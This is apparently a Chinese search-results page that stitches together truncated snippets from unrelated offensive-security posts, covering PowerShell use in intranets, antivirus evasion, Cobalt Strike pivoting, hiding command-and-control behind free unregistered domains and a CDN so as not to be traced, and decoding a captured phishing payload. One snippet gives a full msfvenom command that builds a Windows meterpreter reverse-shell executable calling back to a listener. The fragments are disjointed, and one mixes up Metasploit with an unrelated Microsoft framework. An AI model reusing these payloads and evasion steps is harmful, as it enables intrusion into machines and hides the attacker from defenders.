powershell是一个很好的宝藏库，在内网中可能会给出意外惊喜。 挑一点重点说说,本文的杀软以火绒为主。 其实我们都用过powershell， 比如ls，dir ...

被控端生成：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线：msf5 > use ...

正文 域名和CDN配置 需要的东西：一台国外的VPS 这里我推荐vultr （腾讯云和阿里云等国内的VPS是不支持免备案的） 说到域名上线，自然就不能老老实实的去用自己备案了的域名，不然又是一个当场逮捕。 到这里https://freenom.com/ 注册一个免费且不用备案的的tk域名 ...

在做一个小项目的过程中用到了 powershell 反弹 shell 到 msf，在本地和靶机分别做了几次实验，记录下来 payload 一、msfvenom生成ps1木马 msf 生成 ps1，传到目标再远程执行，但是 ps1 不能在 cmd 下执行，查资料了解到 cmd 执行如下命令 ...

cs 多层代理+msf（frp代理）联合 1.cs多层代理 目标机器： 当目标多层内网的时候，如何把每一层机器都上线到cs端呢， 如果是msf直接可以一层一层写路由即可，cs需要借助上一层上线。 这里直接第一层使用powershell上线 可以看到，目标存在另一个内网 ...

什么是MSF MSF，即Microsoft Solution Framework，也就是微软推荐的做软件的方法。 MSF发展：大约在1994年，微软在总结了自己产品团队的开发经验和教训，以及微软咨询服务部门的业务经验后，推出了Microsoft 解决方案框架Microsoft Solution ...

方法1：ps1免杀 共五步 总述：主要就是[Byte[]]$var_code换一种编码，然后改掉关键词，比如函数名，变量名。 1.CS生成ps1 主要改：[Byte[]]$var ...

前言 演练项目，抓到一个Cs的hta形式的powershell木马，通过hta钓鱼上线，Payload是Powershell 解密 其实根据态势感知流量分析已经获得了公网IP，出于兴趣解密一下 脚本如下: base64后 发现将base64解码存入流中，然后有Gzip解压缩 ...